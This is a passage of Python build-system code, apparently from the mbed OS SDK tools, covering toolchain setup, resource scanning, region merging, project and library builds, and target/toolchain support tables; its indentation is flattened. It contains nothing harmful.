# Pass all params to the unified prepare_resources()
toolchain = prepare_toolchain(src_paths, None, target, toolchain_name)
# Scan src_path for config files
resources = toolchain.scan_resources(src_paths[0])
for path in src_paths[1:]:
resources.add(toolchain.scan_resources(path))
# Update configuration files until added features creates no changes
prev_features = set()
while True:
# Update the configuration with any .json files found while scanning
toolchain.config.add_config_files(resources.json_files)
# Add features while we find new ones
features = set(toolchain.config.get_features())
if features == prev_features:
break
for feature in features:
if feature in resources.features:
resources += resources.features[feature]
prev_features = features
toolchain.config.validate_config()
if toolchain.config.has_regions:
_ = list(toolchain.config.regions)
cfg, macros = toolchain.config.get_config_data()
features = toolchain.config.get_features()
return cfg, macros, features
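# For example (illustrative arguments), a caller can obtain the merged
# configuration data for a target/toolchain pair with:
#
#   cfg, macros, features = get_config(["."], "K64F", "GCC_ARM")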
def is_official_target(target_name, version):
""" Returns True, None if a target is part of the official release for the
given version. Return False, 'reason' if a target is not part of the
official release for the given version.
Positional arguments:
target_name - Name if the target (ex. 'K64F')
version - The release version string. Should be a string contained within
RELEASE_VERSIONS
"""
result = True
reason = None
target = TARGET_MAP[target_name]
if hasattr(target, 'release_versions') \
and version in target.release_versions:
if version == '2':
# For version 2, either ARM or uARM toolchain support is required
required_toolchains = set(['ARM', 'uARM'])
if not len(required_toolchains.intersection(
set(target.supported_toolchains))) > 0:
result = False
reason = ("Target '%s' must support " % target.name) + \
("one of the folowing toolchains to be included in the") + \
((" mbed 2.0 official release: %s" + linesep) %
", ".join(required_toolchains)) + \
("Currently it is only configured to support the ") + \
("following toolchains: %s" %
", ".join(target.supported_toolchains))
elif version == '5':
# For version 5, ARM, GCC_ARM, and IAR toolchain support is required
required_toolchains = set(['ARM', 'GCC_ARM', 'IAR'])
required_toolchains_sorted = list(required_toolchains)
required_toolchains_sorted.sort()
supported_toolchains = set(target.supported_toolchains)
supported_toolchains_sorted = list(supported_toolchains)
supported_toolchains_sorted.sort()
if not required_toolchains.issubset(supported_toolchains):
result = False
reason = ("Target '%s' must support " % target.name) + \
("ALL of the folowing toolchains to be included in the") + \
((" mbed OS 5.0 official release: %s" + linesep) %
", ".join(required_toolchains_sorted)) + \
("Currently it is only configured to support the ") + \
("following toolchains: %s" %
", ".join(supported_toolchains_sorted))
elif not target.default_lib == 'std':
result = False
reason = ("Target '%s' must set the " % target.name) + \
("'default_lib' to 'std' to be included in the ") + \
("mbed OS 5.0 official release." + linesep) + \
("Currently it is set to '%s'" % target.default_lib)
else:
result = False
reason = ("Target '%s' has set an invalid release version of '%s'" %
                      (target.name, version)) + \
("Please choose from the following release versions: %s" %
', '.join(RELEASE_VERSIONS))
else:
result = False
if not hasattr(target, 'release_versions'):
reason = "Target '%s' " % target.name
reason += "does not have the 'release_versions' key set"
elif not version in target.release_versions:
reason = "Target '%s' does not contain the version '%s' " % \
(target.name, version)
reason += "in its 'release_versions' key"
return result, reason
def transform_release_toolchains(toolchains, version):
""" Given a list of toolchains and a release version, return a list of
only the supported toolchains for that release
Positional arguments:
toolchains - The list of toolchains
version - The release version string. Should be a string contained within
RELEASE_VERSIONS
"""
if version == '5':
return ['ARM', 'GCC_ARM', 'IAR']
else:
return toolchains
def get_mbed_official_release(version):
""" Given a release version string, return a tuple that contains a target
and the supported toolchains for that release.
Ex. Given '2', return (('LPC1768', ('ARM', 'GCC_ARM')),
('K64F', ('ARM', 'GCC_ARM')), ...)
Positional arguments:
version - The version string. Should be a string contained within
RELEASE_VERSIONS
"""
mbed_official_release = (
tuple(
tuple(
[
TARGET_MAP[target].name,
tuple(transform_release_toolchains(
TARGET_MAP[target].supported_toolchains, version))
]
) for target in TARGET_NAMES \
if (hasattr(TARGET_MAP[target], 'release_versions')
and version in TARGET_MAP[target].release_versions)
)
)
for target in mbed_official_release:
is_official, reason = is_official_target(target[0], version)
if not is_official:
raise InvalidReleaseTargetException(reason)
return mbed_official_release
def add_regions_to_profile(profile, config, toolchain_class):
"""Add regions to the build profile, if there are any.
Positional Arguments:
profile - the profile to update
config - the configuration object that owns the region
toolchain_class - the class of the toolchain being used
"""
if not profile:
return
regions = list(config.regions)
for region in regions:
for define in [(region.name.upper() + "_ADDR", region.start),
(region.name.upper() + "_SIZE", region.size)]:
profile["common"].append("-D%s=0x%x" % define)
active_region = [r for r in regions if r.active][0]
for define in [("MBED_APP_START", active_region.start),
("MBED_APP_SIZE", active_region.size)]:
profile["ld"].append(toolchain_class.make_ld_define(*define))
print("Using regions in this build:")
for region in regions:
print(" Region %s size 0x%x, offset 0x%x"
% (region.name, region.size, region.start))
def prepare_toolchain(src_paths, build_dir, target, toolchain_name,
macros=None, clean=False, jobs=1,
notify=None, silent=False, verbose=False,
extra_verbose=False, config=None,
app_config=None, build_profile=None):
""" Prepares resource related objects - toolchain, target, config
Positional arguments:
src_paths - the paths to source directories
target - ['LPC1768', 'LPC11U24', etc.]
toolchain_name - ['ARM', 'uARM', 'GCC_ARM', 'GCC_CR']
Keyword arguments:
macros - additional macros
clean - Rebuild everything if True
jobs - how many compilers we can run at once
notify - Notify function for logs
silent - suppress printing of progress indicators
verbose - Write the actual tools command lines used if True
extra_verbose - even more output!
config - a Config object to use instead of creating one
app_config - location of a chosen mbed_app.json file
build_profile - a list of mergeable build profiles
"""
# We need to remove all paths which are repeated to avoid
# multiple compilations and linking with the same objects
src_paths = [src_paths[0]] + list(set(src_paths[1:]))
# If the configuration object was not yet created, create it now
config = config or Config(target, src_paths, app_config=app_config)
target = config.target
try:
cur_tc = TOOLCHAIN_CLASSES[toolchain_name]
except KeyError:
raise KeyError("Toolchain %s not supported" % toolchain_name)
profile = {'c': [], 'cxx': [], 'common': [], 'asm': [], 'ld': []}
for contents in build_profile or []:
for key in profile:
profile[key].extend(contents[toolchain_name][key])
if config.has_regions:
add_regions_to_profile(profile, config, cur_tc)
toolchain = cur_tc(target, notify, macros, silent, build_dir=build_dir,
extra_verbose=extra_verbose, build_profile=profile)
toolchain.config = config
toolchain.jobs = jobs
toolchain.build_all = clean
toolchain.VERBOSE = verbose
return toolchain
def merge_region_list(region_list, destination, padding=b'\xFF'):
"""Merege the region_list into a single image
Positional Arguments:
region_list - list of regions, which should contain filenames
destination - file name to write all regions to
    padding - bytes to fill gaps with
"""
merged = IntelHex()
print("Merging Regions:")
for region in region_list:
if region.active and not region.filename:
raise ToolException("Active region has no contents: No file found.")
if region.filename:
print(" Filling region %s with %s" % (region.name, region.filename))
part = intelhex_offset(region.filename, offset=region.start)
part_size = (part.maxaddr() - part.minaddr()) + 1
if part_size > region.size:
raise ToolException("Contents of region %s does not fit"
% region.name)
merged.merge(part)
pad_size = region.size - part_size
if pad_size > 0 and region != region_list[-1]:
print(" Padding region %s with 0x%x bytes" % (region.name, pad_size))
merged.puts(merged.maxaddr() + 1, padding * pad_size)
if not exists(dirname(destination)):
makedirs(dirname(destination))
print("Space used after regions merged: 0x%x" %
(merged.maxaddr() - merged.minaddr() + 1))
with open(destination, "wb+") as output:
merged.tofile(output, format='bin')
def scan_resources(src_paths, toolchain, dependencies_paths=None,
inc_dirs=None, base_path=None, collect_ignores=False):
""" Scan resources using initialized toolcain
Positional arguments
src_paths - the paths to source directories
toolchain - valid toolchain object
dependencies_paths - dependency paths that we should scan for include dirs
inc_dirs - additional include directories which should be added to
the scanner resources
"""
# Scan src_path
resources = toolchain.scan_resources(src_paths[0], base_path=base_path,
collect_ignores=collect_ignores)
for path in src_paths[1:]:
resources.add(toolchain.scan_resources(path, base_path=base_path,
collect_ignores=collect_ignores))
# Scan dependency paths for include dirs
if dependencies_paths is not None:
for path in dependencies_paths:
lib_resources = toolchain.scan_resources(path)
resources.inc_dirs.extend(lib_resources.inc_dirs)
# Add additional include directories if passed
if inc_dirs:
if type(inc_dirs) == ListType:
resources.inc_dirs.extend(inc_dirs)
else:
resources.inc_dirs.append(inc_dirs)
# Load resources into the config system which might expand/modify resources
# based on config data
resources = toolchain.config.load_resources(resources)
# Set the toolchain's configuration data
toolchain.set_config_data(toolchain.config.get_config_data())
if (hasattr(toolchain.target, "release_versions") and
"5" not in toolchain.target.release_versions and
"rtos" in toolchain.config.lib_config_data):
if "Cortex-A" in toolchain.target.core:
raise NotSupportedException(
("%s Will be supported in mbed OS 5.6. "
"To use the %s, please checkout the mbed OS 5.4 release branch. "
"See https://developer.mbed.org/platforms/Renesas-GR-PEACH/#important-notice "
"for more information") % (toolchain.target.name, toolchain.target.name))
else:
raise NotSupportedException("Target does not support mbed OS 5")
return resources
def build_project(src_paths, build_path, target, toolchain_name,
libraries_paths=None, linker_script=None,
clean=False, notify=None, verbose=False, name=None,
macros=None, inc_dirs=None, jobs=1, silent=False,
report=None, properties=None, project_id=None,
project_description=None, extra_verbose=False, config=None,
app_config=None, build_profile=None, stats_depth=None):
""" Build a project. A project may be a test or a user program.
Positional arguments:
src_paths - a path or list of paths that contain all files needed to build
the project
build_path - the directory where all of the object files will be placed
target - the MCU or board that the project will compile for
toolchain_name - the name of the build tools
Keyword arguments:
libraries_paths - The location of libraries to include when linking
    linker_script - the file that drives the linker to do its job
clean - Rebuild everything if True
notify - Notify function for logs
verbose - Write the actual tools command lines used if True
name - the name of the project
macros - additional macros
inc_dirs - additional directories where include files may be found
jobs - how many compilers we can run at once
silent - suppress printing of progress indicators
report - a dict where a result may be appended
    properties - a dict to fill with test properties (target, toolchain, vendor)
project_id - the name put in the report
project_description - the human-readable version of what this thing does
extra_verbose - even more output!
config - a Config object to use instead of creating one
app_config - location of a chosen mbed_app.json file
build_profile - a dict of flags that will be passed to the compiler
stats_depth - depth level for memap to display file/dirs
"""
# Convert src_path to a list if needed
if type(src_paths) != ListType:
src_paths = [src_paths]
    # Extend src_paths with libraries_paths
if libraries_paths is not None:
src_paths.extend(libraries_paths)
inc_dirs.extend(map(dirname, libraries_paths))
if clean and exists(build_path):
rmtree(build_path)
mkdir(build_path)
toolchain = prepare_toolchain(
src_paths, build_path, target, toolchain_name, macros=macros,
clean=clean, jobs=jobs, notify=notify, silent=silent, verbose=verbose,
extra_verbose=extra_verbose, config=config, app_config=app_config,
build_profile=build_profile)
# The first path will give the name to the library
name = (name or toolchain.config.name or
basename(normpath(abspath(src_paths[0]))))
toolchain.info("Building project %s (%s, %s)" %
(name, toolchain.target.name, toolchain_name))
# Initialize reporting
if report != None:
start = time()
# If project_id is specified, use that over the default name
id_name = project_id.upper() if project_id else name.upper()
description = project_description if project_description else name
vendor_label = toolchain.target.extra_labels[0]
prep_report(report, toolchain.target.name, toolchain_name, id_name)
cur_result = create_result(toolchain.target.name, toolchain_name,
id_name, description)
if properties != None:
prep_properties(properties, toolchain.target.name, toolchain_name,
vendor_label)
try:
# Call unified scan_resources
resources = scan_resources(src_paths, toolchain, inc_dirs=inc_dirs)
# Change linker script if specified
if linker_script is not None:
resources.linker_script = linker_script
# Compile Sources
objects = toolchain.compile_sources(resources, resources.inc_dirs)
resources.objects.extend(objects)
# Link Program
if toolchain.config.has_regions:
res, _ = toolchain.link_program(resources, build_path, name + "_application")
region_list = list(toolchain.config.regions)
region_list = [r._replace(filename=res) if r.active else r
for r in region_list]
res = join(build_path, name) + ".bin"
merge_region_list(region_list, res)
else:
res, _ = toolchain.link_program(resources, build_path, name)
memap_instance = getattr(toolchain, 'memap_instance', None)
memap_table = ''
if memap_instance:
# Write output to stdout in text (pretty table) format
memap_table = memap_instance.generate_output('table', stats_depth)
if not silent:
                print(memap_table)
# Write output to file in JSON format
map_out = join(build_path, name + "_map.json")
memap_instance.generate_output('json', stats_depth, map_out)
# Write output to file in CSV format for the CI
map_csv = join(build_path, name + "_map.csv")
memap_instance.generate_output('csv-ci', stats_depth, map_csv)
resources.detect_duplicates(toolchain)
if report != None:
end = time()
cur_result["elapsed_time"] = end - start
cur_result["output"] = toolchain.get_output() + memap_table
cur_result["result"] = "OK"
cur_result["memory_usage"] = memap_instance.mem_report
cur_result["bin"] = res
cur_result["elf"] = splitext(res)[0] + ".elf"
cur_result.update(toolchain.report)
add_result_to_report(report, cur_result)
return res
except Exception as exc:
if report != None:
end = time()
if isinstance(exc, NotSupportedException):
cur_result["result"] = "NOT_SUPPORTED"
else:
cur_result["result"] = "FAIL"
cur_result["elapsed_time"] = end - start
toolchain_output = toolchain.get_output()
if toolchain_output:
cur_result["output"] += toolchain_output
add_result_to_report(report, cur_result)
# Let Exception propagate
raise
def build_library(src_paths, build_path, target, toolchain_name,
dependencies_paths=None, name=None, clean=False,
archive=True, notify=None, verbose=False, macros=None,
inc_dirs=None, jobs=1, silent=False, report=None,
properties=None, extra_verbose=False, project_id=None,
remove_config_header_file=False, app_config=None,
build_profile=None):
""" Build a library
Positional arguments:
src_paths - a path or list of paths that contain all files needed to build
the library
build_path - the directory where all of the object files will be placed
target - the MCU or board that the project will compile for
toolchain_name - the name of the build tools
Keyword arguments:
dependencies_paths - The location of libraries to include when linking
name - the name of the library
clean - Rebuild everything if True
archive - whether the library will create an archive file
notify - Notify function for logs
verbose - Write the actual tools command lines used if True
macros - additional macros
inc_dirs - additional directories where include files may be found
jobs - how many compilers we can run at once
silent - suppress printing of progress indicators
report - a dict where a result may be appended
    properties - a dict to fill with test properties (target, toolchain, vendor)
extra_verbose - even more output!
project_id - the name that goes in the report
remove_config_header_file - delete config header file when done building
app_config - location of a chosen mbed_app.json file
build_profile - a dict of flags that will be passed to the compiler
"""
# Convert src_path to a list if needed
if type(src_paths) != ListType:
src_paths = [src_paths]
# Build path
if archive:
# Use temp path when building archive
tmp_path = join(build_path, '.temp')
mkdir(tmp_path)
else:
tmp_path = build_path
# Clean the build directory
if clean and exists(tmp_path):
rmtree(tmp_path)
mkdir(tmp_path)
# Pass all params to the unified prepare_toolchain()
toolchain = prepare_toolchain(
src_paths, build_path, target, toolchain_name, macros=macros,
clean=clean, jobs=jobs, notify=notify, silent=silent,
verbose=verbose, extra_verbose=extra_verbose, app_config=app_config,
build_profile=build_profile)
# The first path will give the name to the library
if name is None:
name = basename(normpath(abspath(src_paths[0])))
toolchain.info("Building library %s (%s, %s)" %
(name, toolchain.target.name, toolchain_name))
# Initialize reporting
if report != None:
start = time()
# If project_id is specified, use that over the default name
id_name = project_id.upper() if project_id else name.upper()
description = name
vendor_label = toolchain.target.extra_labels[0]
prep_report(report, toolchain.target.name, toolchain_name, id_name)
cur_result = create_result(toolchain.target.name, toolchain_name,
id_name, description)
cur_result['type'] = 'library'
if properties != None:
prep_properties(properties, toolchain.target.name, toolchain_name,
vendor_label)
for src_path in src_paths:
if not exists(src_path):
error_msg = "The library source folder does not exist: %s", src_path
if report != None:
cur_result["output"] = error_msg
cur_result["result"] = "FAIL"
add_result_to_report(report, cur_result)
raise Exception(error_msg)
try:
# Call unified scan_resources
resources = scan_resources(src_paths, toolchain,
dependencies_paths=dependencies_paths,
inc_dirs=inc_dirs)
# Copy headers, objects and static libraries - all files needed for
# static lib
toolchain.copy_files(resources.headers, build_path, resources=resources)
toolchain.copy_files(resources.objects, build_path, resources=resources)
toolchain.copy_files(resources.libraries, build_path,
resources=resources)
toolchain.copy_files(resources.json_files, build_path,
resources=resources)
if resources.linker_script:
toolchain.copy_files(resources.linker_script, build_path,
resources=resources)
if resources.hex_files:
toolchain.copy_files(resources.hex_files, build_path,
resources=resources)
# Compile Sources
objects = toolchain.compile_sources(resources, resources.inc_dirs)
resources.objects.extend(objects)
if archive:
toolchain.build_library(objects, build_path, name)
if remove_config_header_file:
config_header_path = toolchain.get_config_header()
if config_header_path:
remove(config_header_path)
if report != None:
end = time()
cur_result["elapsed_time"] = end - start
cur_result["output"] = toolchain.get_output()
cur_result["result"] = "OK"
add_result_to_report(report, cur_result)
return True
except Exception as exc:
if report != None:
end = time()
if isinstance(exc, ToolException):
cur_result["result"] = "FAIL"
elif isinstance(exc, NotSupportedException):
cur_result["result"] = "NOT_SUPPORTED"
cur_result["elapsed_time"] = end - start
toolchain_output = toolchain.get_output()
if toolchain_output:
cur_result["output"] += toolchain_output
add_result_to_report(report, cur_result)
# Let Exception propagate
raise
######################
### Legacy methods ###
######################
def mbed2_obj_path(target_name, toolchain_name):
real_tc_name = TOOLCHAIN_CLASSES[toolchain_name].__name__
return join("TARGET_" + target_name, "TOOLCHAIN_" + real_tc_name)
def build_lib(lib_id, target, toolchain_name, verbose=False,
clean=False, macros=None, notify=None, jobs=1, silent=False,
report=None, properties=None, extra_verbose=False,
build_profile=None):
""" Legacy method for building mbed libraries
Positional arguments:
lib_id - the library's unique identifier
target - the MCU or board that the project will compile for
toolchain_name - the name of the build tools
Keyword arguments:
clean - Rebuild everything if True
verbose - Write the actual tools command lines used if True
macros - additional macros
notify - Notify function for logs
jobs - how many compilers we can run at once
silent - suppress printing of progress indicators
report - a dict where a result may be appended
    properties - a dict to fill with test properties (target, toolchain, vendor)
extra_verbose - even more output!
build_profile - a dict of flags that will be passed to the compiler
"""
lib = Library(lib_id)
if not lib.is_supported(target, toolchain_name):
print('Library "%s" is not yet supported on target %s with toolchain %s'
% (lib_id, target.name, toolchain_name))
return False
# We need to combine macros from parameter list with macros from library
# definition
lib_macros = lib.macros if lib.macros else []
if macros:
macros.extend(lib_macros)
else:
macros = lib_macros
src_paths = lib.source_dir
build_path = lib.build_dir
dependencies_paths = lib.dependencies
inc_dirs = lib.inc_dirs
inc_dirs_ext = lib.inc_dirs_ext
if type(src_paths) != ListType:
src_paths = [src_paths]
# The first path will give the name to the library
name = basename(src_paths[0])
if report != None:
start = time()
id_name = name.upper()
description = name
vendor_label = target.extra_labels[0]
cur_result = None
prep_report(report, target.name, toolchain_name, id_name)
cur_result = create_result(target.name, toolchain_name, id_name,
description)
if properties != None:
prep_properties(properties, target.name, toolchain_name,
vendor_label)
for src_path in src_paths:
if not exists(src_path):
error_msg = "The library source folder does not exist: %s", src_path
if report != None:
cur_result["output"] = error_msg
cur_result["result"] = "FAIL"
add_result_to_report(report, cur_result)
raise Exception(error_msg)
try:
# Toolchain instance
# Create the desired build directory structure
bin_path = join(build_path, mbed2_obj_path(target.name, toolchain_name))
mkdir(bin_path)
tmp_path = join(build_path, '.temp', mbed2_obj_path(target.name,
toolchain_name))
mkdir(tmp_path)
toolchain = prepare_toolchain(
src_paths, tmp_path, target, toolchain_name, macros=macros,
notify=notify, silent=silent, extra_verbose=extra_verbose,
build_profile=build_profile, jobs=jobs, clean=clean)
toolchain.info("Building library %s (%s, %s)" %
(name.upper(), target.name, toolchain_name))
# Take into account the library configuration (MBED_CONFIG_FILE)
config = toolchain.config
config.add_config_files([MBED_CONFIG_FILE])
# Scan Resources
resources = []
for src_path in src_paths:
resources.append(toolchain.scan_resources(src_path))
# Add extra include directories / files which are required by library
        # These files usually are not in the same directory as the source files, so
        # the previous scan will not include them
if inc_dirs_ext is not None:
for inc_ext in inc_dirs_ext:
resources.append(toolchain.scan_resources(inc_ext))
# Dependencies Include Paths
dependencies_include_dir = []
if dependencies_paths is not None:
for path in dependencies_paths:
lib_resources = toolchain.scan_resources(path)
dependencies_include_dir.extend(lib_resources.inc_dirs)
dependencies_include_dir.extend(map(dirname, lib_resources.inc_dirs))
if inc_dirs:
dependencies_include_dir.extend(inc_dirs)
# Add other discovered configuration data to the configuration object
for res in resources:
config.load_resources(res)
toolchain.set_config_data(toolchain.config.get_config_data())
# Copy Headers
for resource in resources:
toolchain.copy_files(resource.headers, build_path,
resources=resource)
dependencies_include_dir.extend(
toolchain.scan_resources(build_path).inc_dirs)
# Compile Sources
objects = []
for resource in resources:
objects.extend(toolchain.compile_sources(resource, dependencies_include_dir))
needed_update = toolchain.build_library(objects, bin_path, name)
if report != None and needed_update:
end = time()
cur_result["elapsed_time"] = end - start
cur_result["output"] = toolchain.get_output()
cur_result["result"] = "OK"
add_result_to_report(report, cur_result)
return True
except Exception:
if report != None:
end = time()
cur_result["result"] = "FAIL"
cur_result["elapsed_time"] = end - start
toolchain_output = toolchain.get_output()
if toolchain_output:
cur_result["output"] += toolchain_output
add_result_to_report(report, cur_result)
# Let Exception propagate
raise
# We do have unique legacy conventions about how we build and package the mbed
# library
def build_mbed_libs(target, toolchain_name, verbose=False,
clean=False, macros=None, notify=None, jobs=1, silent=False,
report=None, properties=None, extra_verbose=False,
build_profile=None):
""" Function returns True is library was built and false if building was
skipped
Positional arguments:
target - the MCU or board that the project will compile for
toolchain_name - the name of the build tools
Keyword arguments:
verbose - Write the actual tools command lines used if True
clean - Rebuild everything if True
macros - additional macros
notify - Notify function for logs
jobs - how many compilers we can run at once
silent - suppress printing of progress indicators
report - a dict where a result may be appended
    properties - a dict to fill with test properties (target, toolchain, vendor)
extra_verbose - even more output!
build_profile - a dict of flags that will be passed to the compiler
"""
if report != None:
start = time()
id_name = "MBED"
description = "mbed SDK"
vendor_label = target.extra_labels[0]
cur_result = None
prep_report(report, target.name, toolchain_name, id_name)
cur_result = create_result(target.name, toolchain_name, id_name,
description)
if properties != None:
prep_properties(properties, target.name, toolchain_name,
vendor_label)
# Check toolchain support
if toolchain_name not in target.supported_toolchains:
supported_toolchains_text = ", ".join(target.supported_toolchains)
print('%s target is not yet supported by toolchain %s' %
(target.name, toolchain_name))
print('%s target supports %s toolchain%s' %
(target.name, supported_toolchains_text, 's'
if len(target.supported_toolchains) > 1 else ''))
if report != None:
cur_result["result"] = "SKIP"
add_result_to_report(report, cur_result)
return False
try:
# Source and Build Paths
build_target = join(MBED_LIBRARIES, "TARGET_" + target.name)
build_toolchain = join(MBED_LIBRARIES, mbed2_obj_path(target.name, toolchain_name))
mkdir(build_toolchain)
# Toolchain
tmp_path = join(MBED_LIBRARIES, '.temp', mbed2_obj_path(target.name, toolchain_name))
mkdir(tmp_path)
toolchain = prepare_toolchain(
[""], tmp_path, target, toolchain_name, macros=macros,verbose=verbose,
notify=notify, silent=silent, extra_verbose=extra_verbose,
build_profile=build_profile, jobs=jobs, clean=clean)
# Take into account the library configuration (MBED_CONFIG_FILE)
config = toolchain.config
config.add_config_files([MBED_CONFIG_FILE])
toolchain.set_config_data(toolchain.config.get_config_data())
# CMSIS
toolchain.info("Building library %s (%s, %s)" %
('CMSIS', target.name, toolchain_name))
cmsis_src = MBED_CMSIS_PATH
resources = toolchain.scan_resources(cmsis_src)
toolchain.copy_files(resources.headers, build_target)
toolchain.copy_files(resources.linker_script, build_toolchain)
toolchain.copy_files(resources.bin_files, build_toolchain)
objects = toolchain.compile_sources(resources, tmp_path)
toolchain.copy_files(objects, build_toolchain)
# mbed
toolchain.info("Building library %s (%s, %s)" %
('MBED', target.name, toolchain_name))
# Common Headers
toolchain.copy_files([MBED_HEADER], MBED_LIBRARIES)
library_incdirs = [dirname(MBED_LIBRARIES), MBED_LIBRARIES]
for dir, dest in [(MBED_DRIVERS, MBED_LIBRARIES_DRIVERS),
(MBED_PLATFORM, MBED_LIBRARIES_PLATFORM),
(MBED_HAL, MBED_LIBRARIES_HAL)]:
resources = toolchain.scan_resources(dir)
toolchain.copy_files(resources.headers, dest)
library_incdirs.append(dest)
# Target specific sources
hal_src = MBED_TARGETS_PATH
hal_implementation = toolchain.scan_resources(hal_src)
toolchain.copy_files(hal_implementation.headers +
hal_implementation.hex_files +
hal_implementation.libraries +
[MBED_CONFIG_FILE],
build_target, resources=hal_implementation)
toolchain.copy_files(hal_implementation.linker_script, build_toolchain)
toolchain.copy_files(hal_implementation.bin_files, build_toolchain)
incdirs = toolchain.scan_resources(build_target).inc_dirs
objects = toolchain.compile_sources(hal_implementation,
library_incdirs + incdirs)
toolchain.copy_files(objects, build_toolchain)
# Common Sources
mbed_resources = None
for dir in [MBED_DRIVERS, MBED_PLATFORM, MBED_HAL]:
mbed_resources += toolchain.scan_resources(dir)
objects = toolchain.compile_sources(mbed_resources,
library_incdirs + incdirs)
# A number of compiled files need to be copied as objects as opposed to
        # the way the linker searches for symbols in archives. These are:
# - mbed_retarget.o: to make sure that the C standard lib symbols get
# overridden
# - mbed_board.o: mbed_die is weak
# - mbed_overrides.o: this contains platform overrides of various
# weak SDK functions
# - mbed_main.o: this contains main redirection
separate_names, separate_objects = ['mbed_retarget.o', 'mbed_board.o',
'mbed_overrides.o', 'mbed_main.o', 'mbed_sdk_boot.o'], []
for obj in objects:
for name in separate_names:
if obj.endswith(name):
separate_objects.append(obj)
for obj in separate_objects:
objects.remove(obj)
toolchain.build_library(objects, build_toolchain, "mbed")
for obj in separate_objects:
toolchain.copy_files(obj, build_toolchain)
if report != None:
end = time()
cur_result["elapsed_time"] = end - start
cur_result["output"] = toolchain.get_output()
cur_result["result"] = "OK"
add_result_to_report(report, cur_result)
return True
except Exception as exc:
if report != None:
end = time()
cur_result["result"] = "FAIL"
cur_result["elapsed_time"] = end - start
toolchain_output = toolchain.get_output()
if toolchain_output:
cur_result["output"] += toolchain_output
cur_result["output"] += str(exc)
add_result_to_report(report, cur_result)
# Let Exception propagate
raise
def get_unique_supported_toolchains(release_targets=None):
""" Get list of all unique toolchains supported by targets
Keyword arguments:
release_targets - tuple structure returned from get_mbed_official_release().
If release_targets is not specified, then it queries all
known targets
"""
unique_supported_toolchains = []
if not release_targets:
for target in TARGET_NAMES:
for toolchain in TARGET_MAP[target].supported_toolchains:
if toolchain not in unique_supported_toolchains:
unique_supported_toolchains.append(toolchain)
else:
for target in release_targets:
for toolchain in target[1]:
if toolchain not in unique_supported_toolchains:
unique_supported_toolchains.append(toolchain)
if "ARM" in unique_supported_toolchains:
unique_supported_toolchains.append("ARMC6")
return unique_supported_toolchains
def mcu_toolchain_list(release_version='5'):
""" Shows list of toolchains
"""
if isinstance(release_version, basestring):
# Force release_version to lowercase if it is a string
release_version = release_version.lower()
else:
# Otherwise default to printing all known targets and toolchains
release_version = 'all'
version_release_targets = {}
version_release_target_names = {}
for version in RELEASE_VERSIONS:
version_release_targets[version] = get_mbed_official_release(version)
version_release_target_names[version] = [x[0] for x in
version_release_targets[
version]]
if release_version in RELEASE_VERSIONS:
release_targets = version_release_targets[release_version]
else:
release_targets = None
unique_supported_toolchains = get_unique_supported_toolchains(
release_targets)
columns = ["mbed OS %s" % x for x in RELEASE_VERSIONS] + unique_supported_toolchains
return "\n".join(columns)
def mcu_target_list(release_version='5'):
""" Shows target list
"""
if isinstance(release_version, basestring):
# Force release_version to lowercase if it is a string
release_version = release_version.lower()
else:
# Otherwise default to printing all known targets and toolchains
release_version = 'all'
version_release_targets = {}
version_release_target_names = {}
for version in RELEASE_VERSIONS:
version_release_targets[version] = get_mbed_official_release(version)
version_release_target_names[version] = [x[0] for x in
version_release_targets[
version]]
if release_version in RELEASE_VERSIONS:
release_targets = version_release_targets[release_version]
else:
release_targets = None
target_names = []
if release_targets:
target_names = [x[0] for x in release_targets]
else:
target_names = TARGET_NAMES
return "\n".join(target_names)
def mcu_toolchain_matrix(verbose_html=False, platform_filter=None,
release_version='5'):
""" Shows target map using prettytable
Keyword arguments:
verbose_html - emit html instead of a simple table
platform_filter - remove results that match the string
release_version - get the matrix for this major version number
"""
# Only use it in this function so building works without extra modules
from prettytable import PrettyTable
if isinstance(release_version, basestring):
# Force release_version to lowercase if it is a string
release_version = release_version.lower()
else:
# Otherwise default to printing all known targets and toolchains
release_version = 'all'
version_release_targets = {}
version_release_target_names = {}
for version in RELEASE_VERSIONS:
version_release_targets[version] = get_mbed_official_release(version)
version_release_target_names[version] = [x[0] for x in
version_release_targets[
version]]
if release_version in RELEASE_VERSIONS:
release_targets = version_release_targets[release_version]
else:
release_targets = None
unique_supported_toolchains = get_unique_supported_toolchains(
release_targets)
prepend_columns = ["Target"] + ["mbed OS %s" % x for x in RELEASE_VERSIONS]
# All tests status table print
columns = prepend_columns + unique_supported_toolchains
table_printer = PrettyTable(columns)
# Align table
for col in columns:
table_printer.align[col] = "c"
table_printer.align["Target"] = "l"
perm_counter = 0
target_counter = 0
target_names = []
if release_targets:
target_names = [x[0] for x in release_targets]
else:
target_names = TARGET_NAMES
for target in sorted(target_names):
if platform_filter is not None:
# Filter out platforms using regex
if re.search(platform_filter, target) is None:
continue
target_counter += 1
row = [target] # First column is platform name
for version in RELEASE_VERSIONS:
if target in version_release_target_names[version]:
text = "Supported"
else:
text = "-"
row.append(text)
for unique_toolchain in unique_supported_toolchains:
if (unique_toolchain in TARGET_MAP[target].supported_toolchains or
(unique_toolchain == "ARMC6" and
"ARM" in TARGET_MAP[target].supported_toolchains)):
text = "Supported"
perm_counter += 1
else:
text = "-"
row.append(text)
table_printer.add_row(row)
result = table_printer.get_html_string() if verbose_html \
else table_printer.get_string()
result += "\n"
result += "Supported targets: %d\n"% (target_counter)
if target_counter == 1:
result += "Supported toolchains: %d"% (perm_counter)
return result
def get_target_supported_toolchains(target):
""" Returns target supported toolchains list
Positional arguments:
target - the target to get the supported toolchains of
"""
return TARGET_MAP[target].supported_toolchains if target in TARGET_MAP \
else None
def print_build_results(result_list, build_name):
""" Generate result string for build results
Positional arguments:
result_list - the list of results to print
build_name - the name of the build we are printing result for
"""
result = ""
if len(result_list) > 0:
result += build_name + "\n"
result += "\n".join([" * %s" % f for f in result_list])
result += "\n"
return result
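# A minimal usage sketch for print_build_results(); the result strings and the
# headings below are illustrative placeholders rather than real build output.
def _example_summarise_results():
    successes = ["K64F::GCC_ARM::MBED-BUILD"]
    failures = []
    summary = print_build_results(successes, "Build successes:")
    summary += print_build_results(failures, "Build failures:")
    return summary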
def print_build_memory_usage(report):
""" Generate result table with memory usage values for build results
Aggregates (puts together) reports obtained from self.get_memory_summary()
Positional arguments:
report - Report generated during build procedure.
"""
from prettytable import PrettyTable
columns_text = ['name', 'target', 'toolchain']
columns_int = ['static_ram', 'total_flash']
table = PrettyTable(columns_text + columns_int)
for col in columns_text:
table.align[col] = 'l'
for col in columns_int:
table.align[col] = 'r'
for target in report:
for toolchain in report[target]:
for name in report[target][toolchain]:
for dlist in report[target][toolchain][name]:
